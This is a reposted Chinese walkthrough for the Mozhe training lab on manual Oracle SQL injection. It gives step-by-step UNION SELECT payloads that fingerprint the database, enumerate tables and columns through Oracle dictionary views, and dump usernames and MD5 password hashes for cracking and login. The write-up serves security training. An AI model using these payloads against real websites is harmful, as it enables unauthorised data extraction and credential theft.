您的位置:首页 > 游戏 > 手游 > 免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品

免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品

2024/12/25 14:40:33 来源:https://blog.csdn.net/mirliasheong/article/details/144272822  浏览:    关键词:免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品
免费网站建设_好玩网页游戏大全_东莞网站公司_怎么推广产品

进来之后点下面红框进入到有参数的页面

一.判断注入类型

与其他数据库一样,先判断注入类型,输入

?id=1 and 1=1页面正常

?id=1 and 1=2页面异常,说明存在注入,并且是数值型

二.判断列数

通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断

当前字段数为2

三.判断回显点

输入?id=1 union select 'null','null' from dual

四.查询数据库版本

输入

?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

五.查询数据库名

输入?id=-1 union select 'null',(select instance_name from V$INSTANC

E) from dual

六.查询表名

第一个表名,输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

第二个表名,输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

第三个表,输入

?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

查询数据库表名,查询表名⼀般查询admin或者user表

所以我们也可以使用模糊搜索,输入

?id=-1 union select 'null',(select table_name from user_tables

where table_name like '%user%' and rownum=1) from dual

七.查询列名

第一列,输入

?id=-1 union select 'null',(select column_name from user_tab_co

lumns where table_name='sns_users' and rownum=1) from dual

第二列,输入

?id=-1 union select 'null',(select column_name from user_tab_co

lumns where rownum=1 and column_name not in 'USER_NAME') from dual

。。。

。。。一次查询(语法:and...not in+上次查询的列名)

同样我们可以使用模糊搜索:

输入

?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual

输入

?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual

八.结果

输入

?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

我们去md5解密一下

发现没有结果,那么我们继续查询下一个,输入

?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r

ownum=1 and USER_NAME <> 'zhong'

去解密发现还是没有,继续查询

?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r

ownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

解密这个发现密码出来了

九.登录

返回墨者登录页面

就可以提交了,以上就是 【墨者】SQL手工注入(Oracle数据库) 的通关攻略

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com